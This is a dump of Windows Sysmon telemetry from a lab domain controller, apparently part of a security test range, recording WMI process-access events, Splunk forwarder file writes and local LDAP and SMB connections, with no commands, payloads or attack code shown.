combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698155Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698154Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698153Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698152Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698151Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698150Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698149Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698148Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698147Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698146Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698145Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698144Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698143Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698142Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.990{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000001698239Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:51.212{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC0D1D1A695272E12C3E89C2C3659834,SHA256=548A6DE09D03E64723747D05A6EDA1FC1C2FE029C5A72B869009215BF68E795E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698238Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:51.177{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECBC91708C78CB2358F5E35FB92CECE2,SHA256=0BC9336E7BCCDF8F8F1801882EA56346C86A1F8D08F9259B0F3FA900F33319EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698237Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:51.068{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6B7AA12CB459CA5EBC3967B950FBAED8,SHA256=E97D92A3D749835C9EACC7B384AC9E7DCB82DCF9D471E633A29CFB78CDB5D376,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001698242Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:44.466{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55166-false10.0.1.12-8000- 10341000x80000000000000001698241Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:52.365{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-2299-6039-0100-00000000AD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001698240Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:52.240{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=622580BC88867F9CAAE2EAB902F8A4B7,SHA256=EBF13DC5473667B0A1884460994250AC788978576B87DDB4A267AE0109CD8D9E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001698251Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:45.720{05ADC7E1-2299-6039-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local55169-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local445microsoft-ds 354300x80000000000000001698250Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:45.720{05ADC7E1-2299-6039-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local55169-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local445microsoft-ds 23542300x80000000000000001698249Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:53.521{05ADC7E1-229F-6039-1100-00000000AD01}1152NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=CD219E64FE0682E489799D399FD5B8EA,SHA256=68948DBD9EAB392E934DB6AED2AE61A664A14EA7E31CF7D32181DDBB26168F7D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001698248Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:45.619{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-974.attackrange.local55168-false10.0.1.14win-dc-974.attackrange.local389ldap 354300x80000000000000001698247Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:45.619{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55168-false10.0.1.14win-dc-974.attackrange.local389ldap 354300x80000000000000001698246Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:45.611{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local55167-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local389ldap 354300x80000000000000001698245Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:45.611{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local55167-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local389ldap 23542300x80000000000000001698244Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:53.286{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=61E3E0A6D5806E66F829177D0BE53103,SHA256=5812E676B6EAAD551CC55D27B5F86F16DEF1A0EC8F367BD82FA726A65F30EC20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698243Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:53.271{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3BBA05879A3D72E6FEE9904343FF31E,SHA256=36B23F4BA6F1A2C19D317AA7A7237BA1818FECE4967222B05DA0447F63DB36F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698254Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:54.821{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7FED24AEFCBE5A5DEE1DBE962F320BEF,SHA256=C085EFD78132F107D6232FB0F4644C0D30F9A3EC930AADD70CDE1E34E1A698FF,IMPHASH=00000000000000000000000000000000falsetrue 